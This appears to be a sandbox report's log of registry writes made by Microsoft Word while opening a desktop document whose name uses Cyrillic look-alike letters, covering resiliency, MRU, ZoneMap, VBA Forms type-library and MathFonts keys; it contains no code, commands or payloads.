Key
Name
Value
3008
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
d.0
642E3000C00B0000010000000000000000000000
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
3008
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1312751637
3008
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1312751756
3008
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1312751757
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
C00B0000882D8DA659B9D40100000000
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
>/0
3E2F3000C00B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
)00
29303000C00B000006000000010000006800000002000000580000000400000063003A005C00750073006500720073005C00610064006D0069006E005C006400650073006B0074006F0070005C0065006D0065007200670035046E004104790065007800690074006D00300440042E0064006F006300000000000000
3008
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1312751620
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{AA65D180-4D4B-4D06-9763-3B48C6B36ABC}
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
[F00000000][T01D4B959A7557310][O00000000]*C:\Users\admin\Desktop\
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 1
[F00000000][T01D4B959A757BD00][O00000000]*C:\Users\admin\Desktop\Emergеnсyexitmар.doc
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\246DEE
246DEE
04000000C00B00002B00000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0045006D0065007200670035046E004104790065007800690074006D00300440042E0064006F0063001400000045006D0065007200670035046E004104790065007800690074006D00300440042E0064006F0063000000000001000000000000007A0686A659B9D401EE6D2400EE6D240000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{0A2B9D92-7C94-45FA-996E-8B2F0B0FC6BE}\2.0
Microsoft Forms 2.0 Object Library
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{0A2B9D92-7C94-45FA-996E-8B2F0B0FC6BE}\2.0\FLAGS
6
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{0A2B9D92-7C94-45FA-996E-8B2F0B0FC6BE}\2.0\0\win32
C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{0A2B9D92-7C94-45FA-996E-8B2F0B0FC6BE}\2.0\HELPDIR
C:\Users\admin\AppData\Local\Temp\VBE
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}
Font
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}
IDataAutoWrapper
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}
IReturnInteger
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}
IReturnBoolean
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}
IReturnString
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}
IReturnSingle
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}
IReturnEffect
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}
IControl
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}
Controls
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}
IOptionFrame
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}
_UserForm
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}
ControlEvents
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}
FormEvents
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}
OptionFrameEvents
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}
ILabelControl
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}
ICommandButton
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}
IMdcText
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}
IMdcList
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}
IMdcCombo
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}
IMdcCheckBox
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}
IMdcOptionButton
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}
IMdcToggleButton
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}
IScrollbar
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}
Tab
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}
Tabs
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}
ITabStrip
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}
ISpinbutton
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{4C599243-6926-101B-9992-00000B65C6F9}
IImage
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLSubmitButton
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLImage
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLReset
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLCheckbox
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLOption
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLText
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLHidden
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLPassword
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLSelect
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLTextArea
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}
LabelControlEvents
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}
CommandButtonEvents
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}
MdcTextEvents
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}
MdcListEvents
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}
MdcComboEvents
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}
MdcCheckBoxEvents
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}
MdcOptionButtonEvents
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}
MdcToggleButtonEvents
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}
ScrollbarEvents
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}
TabStripEvents
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}
SpinbuttonEvents
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}
ImageEvents
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}
WHTMLControlEvents
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents1
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents2
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents3
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents4
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents5
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents6
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents7
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents9
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents10
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}
IPage
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}
Pages
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}
IMultiPage
3008
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}
MultiPageEvents
3008
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1312751653
3008
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1312751654
3008
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1312751653
3008
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1312751654
3008
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1312751670
3008
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1312751671
3008
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1312751655
3008
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1312751656
3008
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1312751655
3008
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1312751656
3008
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1312751672
3008
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1312751673
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
019C826E445A4649A5B00BF08FCC4EEE
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
1
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
0
3008
WINWORD.EXE
write
